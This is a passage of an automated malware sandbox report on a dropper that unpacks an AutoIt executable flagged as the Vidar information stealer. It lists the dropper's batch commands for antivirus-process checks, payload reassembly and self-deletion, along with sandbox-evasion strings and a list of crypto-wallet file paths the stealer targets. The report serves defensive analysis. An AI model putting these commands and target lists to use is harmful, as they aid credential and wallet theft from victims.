                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Google Drive.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: YouTube.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Sheets.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Gmail.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Slides.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Docs.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: JA7cOAGHym.exeStatic file information: File size 1199374 > 1048576
                Source: JA7cOAGHym.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: JA7cOAGHym.exeStatic PE information: real checksum: 0x12d2d3 should be: 0x128a0e
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000E02DB push cs; retn 000Dh12_2_000E0318
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0DE6 push ecx; ret 12_2_000B0DF9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001226DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_001226DD
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000AFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_000AFC7C
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-103124
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Pokemon.com, 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 3748Thread sleep count: 88 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FDC54
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A087
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0010A1E2
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_000FE472
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_0010A570
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000CC622 FindFirstFileExW,12_2_000CC622
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001066DC FindFirstFileW,FindNextFileW,FindClose,12_2_001066DC
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00107333 FindFirstFileW,FindClose,12_2_00107333
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_001073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001073D4
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000FD921
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00095FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00095FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\208079Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\208079\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: chrome.exe, 00000010.00000002.2707863936.00007C1C006CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                Source: chrome.exe, 00000010.00000002.2705390759.00007C1C00290000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=0950f909-eab1-4d51-88f9-7d20c3570a49
                Source: Web Data.22.drBinary or memory string: discord.comVMware20,11696428655f
                Source: Web Data.22.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: global block list test formVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: chrome.exe, 00000010.00000002.2700251068.000001395ACB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_`
                Source: Pokemon.com, 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074168906.0000000003FDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000014.00000003.2769810750.00005C8400384000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Web Data.22.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Web Data.22.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Web Data.22.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Web Data.22.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: msedge.exe, 00000014.00000002.2837803819.0000026FEF844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Web Data.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Web Data.22.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Web Data.22.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: chrome.exe, 00000010.00000002.2699532957.000001395710C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                Source: Web Data.22.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Web Data.22.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Web Data.22.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Web Data.22.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Web Data.22.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Web Data.22.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Web Data.22.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Web Data.22.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0010F4FF BlockInput,12_2_0010F4FF
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0009338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0009338B
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B5058 mov eax, dword ptr fs:[00000030h]12_2_000B5058
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,12_2_000F20AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000C2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_000C2992
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_000B0BAF
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0D45 SetUnhandledExceptionFilter,12_2_000B0D45
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_000B0F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_000F1B4D
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_0009338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0009338B
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FBBED SendInput,keybd_event,12_2_000FBBED
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000FEC6C mouse_event,12_2_000FEC6C
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208079Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ValidationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAO" Offering Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Pokemon.com yJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_000F14AE
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000F1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_000F1FB0
                Source: Pokemon.com, 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp, Investigator.9.dr, Pokemon.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Pokemon.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000B0A08 cpuid 12_2_000B0A08
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000EE5F4 GetLocalTime,12_2_000EE5F4
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000EE652 GetUserNameW,12_2_000EE652
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_000CBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_000CBCD2
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
